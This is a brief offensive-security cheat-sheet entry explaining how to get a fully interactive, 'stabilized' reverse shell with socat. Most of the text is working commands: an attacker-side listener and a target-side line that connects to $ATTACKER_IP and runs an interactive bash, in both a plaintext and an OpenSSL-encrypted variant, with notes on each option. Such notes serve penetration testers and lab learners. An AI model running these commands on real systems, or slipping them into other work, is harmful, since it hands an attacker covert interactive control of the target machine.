Shell “stabilization” refers to the process of making a remote shell behave like a normal local shell — so, allowing interactive programs to work properly, ensuring that input is not echoed inappropriately, etc.
We can use socat to create an auto-stabilized reverse shell on UNIX-like systems.
# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo.
# Basically the `stty raw -echo`.
#
socat TCP-LISTEN:$LISTENER_PORT FILE:`tty`,raw,echo=0
# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
# pty - allocate a PTTY
# stderr - redirect STDERR to the attacker
# sigint - pass signals (Ctrl+C) through
# setsid - use a new session
# sane - use a variety of tweaks to "normalize" the
# terminal's environment
#
socat TCP:$ATTACKER_IP:$LISTENER_PORT \
EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,saneSame thing, but over an encrypted connection:
# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo. Basically
# the `stty raw -echo`.
#
socat \
OPENSSL-LISTEN:$LISTENER_PORT,cert=$PEM_FILE,verify=0 \
FILE:`tty`,raw,echo=0
# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
# pty - allocate a PTTY
# stderr - redirect STDERR to the attacker
# sigint - pass signals (Ctrl+C) through
# setsid - use a new session
# sane - use a variety of tweaks to "normalize" the
# terminal's environment
#
socat \
OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 \
EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,saneIMPORTANT
The reverse shell will not pick up on your terminal size, so you’ll need to manually specify it using
stty rowsandstty cols.